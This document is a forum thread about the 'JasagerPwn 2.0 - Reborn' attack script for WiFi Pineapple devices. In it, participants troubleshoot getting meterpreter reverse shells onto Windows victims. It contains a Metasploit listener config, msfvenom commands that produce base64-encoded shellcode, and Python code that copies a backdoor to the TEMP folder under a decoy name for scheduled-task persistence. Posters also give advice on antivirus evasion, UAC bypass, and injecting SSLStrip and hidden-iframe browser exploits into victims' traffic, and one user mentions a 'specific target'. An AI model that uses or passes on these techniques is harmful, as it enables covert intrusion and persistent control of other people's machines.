[Script] JasagerPwn 2.0 - Reborn

[Fira]

i'll give it a go tomorrow for sure! :) bit tipsy tonight :) (hic!)

Thanks so much!

[wolfdale]

Uhm is there a way to make it work as a simple python file? Without compiling it to an .exe file with py2exe? I tried executing the inject.py but it kills explorer.exe almost instantly : /

[leg3nd]

Uhm is there a way to make it work as a simple python file? Without compiling it to an .exe file with py2exe? I tried executing the inject.py but it kills explorer.exe almost instantly : /

Of course. You should be able to execute the python script directly.

Explorer.exe will crash if you do not have a listener waiting for the connection; since the connection is refused the script will hit an exception.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 587
set ExitOnSession false
set EXITFUNC thread
set AutoRunScript "migrate -f"
exploit -j

Edited October 25, 2013 by leg3nd

[wolfdale]

Weird..i generated the payload changing Ip address and port to my likings, both VM are on the same (bridged to my network) lan , copied the payload to the inject.py, launched it, and nothing, metasploit shows no sessions :/ I even tried compiling with py2exe ( oh by the way the resulting .exe doesn't have the .ico embedded into it after the process, minor problem).

[leg3nd]

Interesting... if you wanna hop on IRC then I can look into it more.

I assume you're using the command in the top comment of the script to generate it?

[leg3nd]

Update: I have created an infusion for the MK5 called Strip-N-Inject which will combines the SSLStrip attack with code injection all in the same infusion. It is extremely successful and efficient and will provide the code-injection capabilities for any injection-based attack vector. It will be available in your pineapple bar soon so you can use all the features of this script.

Note: Please just "./jasagerPwn -u" before testing anything as I have added some updates for this change.

Thank you for your patience!

Edited October 25, 2013 by leg3nd

[wolfdale]

Sorry, it was kinda late (3 AM here), and went to bed :P

The steps i did for now are:

data=$(msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.249.128 LPORT=587 -f c | tr -d '\"' | tr -d '\n' | awk -F= '{print $2}' | awk '{print $1}') ; python -c 'import base64;print base64.encodestring("'$data'").replace("\n","")'

Generated the payload for my ip.

Copied it into the inject.py replacing code1 variable.

Installed python 2.7.5 onto the windows victim machine.

Started listener on attacker machine

Launched inject.py from the victim machine

But i get no shell on the listener...

I'm using windows 7 64 bit on the victim machine and kali linux fresh install as attacker machine.

EDIT: found the problem. The payload works only on windows 7 32 bit, not 64 bit :/ Any clue?

Edited October 25, 2013 by wolfdale

[leg3nd]

Hmmm... yes I understand the issue here. The problem is that injecting 32 bit shellcode into a 64 bit process will fail (explorer.exe is 64 bit).

Theres 2 potential solutions here:

1. Choose a 32 bit process: Even though the machine is 64-bit, it should work with a 32bit process.
   1. Look in task manager for a process with *32 on the end of it and try using that process instead. The problem here is that most default processes on a 64 bit systems will be 64 bit.
2. Use 64bit shellcode: You can modify that command a bit to generate 64 bit shellcode.

data=$(msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.249.128 LPORT=587 -f c | tr -d '\"' | tr -d '\n' | awk -F= '{print $2}' | awk '{print $1}') ; python -c 'import base64;print base64.encodestring("'$data'").replace("\n","")'

This will work for your testing purposes and for exploited a targeted architecture.. but this is a crappy solution at the end of the day since it's not architecture agnostic. I'll come up with a full-proof solution this weekend... just need to brainstorm a bit.

[Fira]

Update: I have created an infusion for the MK5 called Strip-N-Inject which will combines the SSLStrip attack with code injection all in the same infusion. It is extremely successful and efficient and will provide the code-injection capabilities for any injection-based attack vector. It will be available in your pineapple bar soon so you can use all the features of this script.

Note: Please just "./jasagerPwn -u" before testing anything as I have added some updates for this change.

Thank you for your patience!

Just a quick question....

as the script progresses and new mk5 infusions get written for it, will they be back ported for the mk4? and if not, is there going to be a point where the script doesn't play nice with the mk4 anymore?

just curious :)

thanks again!

Edited October 25, 2013 by Fira

[leg3nd]

I won't be offically supporting the MK4.

Currently, some of the attacks will work such as Fake Update and Java Applet Redirect - however there is no "Strip-N-Inject" infusion for the MK4 so none of those attacks will work. When I'm doing future development for JasagerPwn it will be targeted for the MK5 and won't have much consideration for backwards compatibility with the MK4.

[wolfdale]

Allright, thanks alot!!

I have one more question: Is there a way to make the inject.py code persistent? At the moment the SCHTASKS just starts a python window but doesn't execute inject.py.

The cause probably is this line -> exe_loc = str(sys.executable) which points to python executable (python.exe) at the moment. I'm guessing that when the inject.py is compiled to an .exe this method would return the path to the .exe (which makes more sense :P). Since i'm using it in a non-conventional way (as a .py) this doesn't work.

I modified it this way -> exe_loc = str("C:\Users\myusername\Desktop\inject.py")

Is there a way to copy the inject.py somewhere (i'm thinking documents folder or smth) so that even if someone deletes the .py and reboots I don't loose the shell?

Again thanks for your help, much appreciated :)

[leg3nd]

Yeah currently it will think the python.exe is the current executable.. which technically it is since you're running it through the interpreter.

This was designed to be ran as an EXE for obvious reasons, in which case that line is fine.

However, if you insist on using the interpreter your change will work:

exe_loc = "C:\Users\myusername\Desktop\inject.py"

[wolfdale]

Yup, but its not really persistent because if someone deletes the .py (or even the .exe for that matter), the backdoor won't start again. I was asking if there is a way to move the inject.py somewhere safe (i.e. documents folder) without triggering antiviruses :P

Thanks for your patience :PP

[leg3nd]

Yup, but its not really persistent because if someone deletes the .py (or even the .exe for that matter), the backdoor won't start again. I was asking if there is a way to move the inject.py somewhere safe (i.e. documents folder) without triggering antiviruses :P

Thanks for your patience :PP

The script can copy the current executable to the temporary directory with some name like WRE8285.exe and then use THAT as the schtasks backdoor.

I have that currently implemented in the powershell-https payload.. here is the relevant code:

exe_loc = str(sys.executable) 
backdoor_loc = os.getenv('TEMP') + '\\' + "WRE8284.exe"
proc = subprocess.Popen("copy /y %s %s" %(exe_loc, backdoor_loc), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)  

Then in the XML file I'm generating, replace this:

....." + exe_loc + ".....

with this:

....." + backdoor_loc + "..... 

This is the file you can reference that already does this (ill add this to inject.py with other improvements later on): https://code.google.com/p/jasagerpwn-reborn/source/browse/trunk/resources/meterpreter_powershell-HTTPS/powershell-https.py

A cleartext python script will always have a chance to trigger AV. Compiling it will help a lot with that.

Edited October 25, 2013 by leg3nd

[wolfdale]

Woot that was quick, thanks.

I'm still trying to figure out why x64 payload doesn't work on windows 7 x64 though.

I generated the payload as per your instructions and copied it into code1 variable. Still no shell. The payload is twice as long as a 32 bit payload, maybe there is a problem with memory allocation?

[leg3nd]

Not sure on the top of my head.. I'll do some playing with it this weekend and check if its a memory manipulation issue. I've never tested this with 64 bit shellcode so it could be problematic.

I generated both 32 bit and 64 bit shellcode with your address. The 32 bit is 389 characters and the 64 bit is 565 characters.

Here is the shellcode I generated (with your IPs): http://paste.pound-python.org/show/McfvJRisjSZYcjbYVfm0/

If this doesn't work just keep poking at it or wait until I release a new version this weekend.

Edited October 25, 2013 by leg3nd

[wolfdale]

I doubt it's a problem with the shellcode but i'll give it a try now.

If i can't solve messing around i'll wait for your update :P I'll let you know if i find out something.

Thanks again, i owe you one!

[leg3nd]

I doubt it's a problem with the shellcode but i'll give it a try now.

If i can't solve messing around i'll wait for your update :P I'll let you know if i find out something.

Thanks again, i owe you one!

Updated. I changed out the process injection for a simpler direct shellcode execution.. this will work on both 32 and 64 bit Windows 7 and is much more stable since it doesn't touch external memory or process space.

If you want to migrate you can just use metasploit for that. I believe they have a new "set PrependMigrate true" option, or AutoRunScript "migrate -f -k".

Let me know how this one works for you.

EDIT: On an unrelated note - I just added in a Metasploit BrowserPwn invisible iFrame injection attack. This will allow the victim to browser normally while they are sslstriped and have exploits injected into the browser in the background.

Edited October 26, 2013 by leg3nd

[wolfdale]

It works GREAT, both on windows 7 32 and 64 bit. Should work on w8 too right? I'll try it later.

Now, i need to include this into a python script which will be ran with python 64 bit version on windows 7. In this case it doesn't work. It works only if 32 bit version of python is installed. I printed the exception, its a memory access violation.

Obviously the cause is this function here

def run_sc(shellcode):

I'm poking around looking for a solution, any input will be appreciated :)

If i may add a suggestion : now that the reverse shell is stable (damn if it is stable :P), you could add the .exe to startup with windows, instead of adding a schtask. Alot of notepad.exe are gonna look suspicious.

Now testing the payload in windows 8. I'll let you know.

Edit: payload working fine on windows 8.

Edited October 27, 2013 by wolfdale

[leg3nd]

Dont know that the exception matters; it's loading my meterpreters just fine.

Yes.. this is using 32 bit shellcode and is compiled into a 32 bit binary that can be used on both 32/64 bit platforms. You'll need to change things if you want it to be purely 64 bit - but that will not work on 32 bit platforms.. so I don't get what you're trying to do.

I also don't see much point in deploying this as a python script since 99% of people don't have python installed.

[wolfdale]

I have a very specific target which uses python 64 bit, so i wanted a python script that could work with python 2.7.5 64 bit.

I have never used ctypes library so i have no idea where to start.

Don't worry too much about it you have helped me enough already :P I'll study more the matter when I have sometime free from Uni.

[wolfdale]

I've got another question, is there a way to execute in memory bypass_uac as well?

[leg3nd]

I've got another question, is there a way to execute in memory bypass_uac as well?

Its theoretically possible. Any code that can be executed from disk can be turned into shellcode and executed in memory.

This is a known, working UAC bypass by Dave Kennedy: https://www.trustedsec.com/files/bypassuac.zip

It will need to be modified to run in memory.

Edited October 29, 2013 by leg3nd

[wolfdale]

Finally got the bypass_uac working (although not in memory). Had to recompile it to avoid AV. This is fine by me for now.

Metasploit was insisting to upload his unencrypted payload for the reverse shell when i was using bypass_uac module. Used yours and obviously everything went fine and dandy.

I'm an happy man :D

[h0T_rails]

So I've been trying to install JasagerPwn on the latest firmware, and it doesnt look like its gonna work. I got it to install on Kali 1.05 ok. but I can't seem to get it from my Kali box to the pineapple. I reall like the whole concept/idea of JasagerPwn Reborn. It sounds so bad ass. Do you think that i could inject those same exploits/payloads mentioned in this post with "strip-n-inject" ? sorry for askin, but im at my wits end here. I'v been reading this post all night and still havent had any luck.anyways, please hit me up.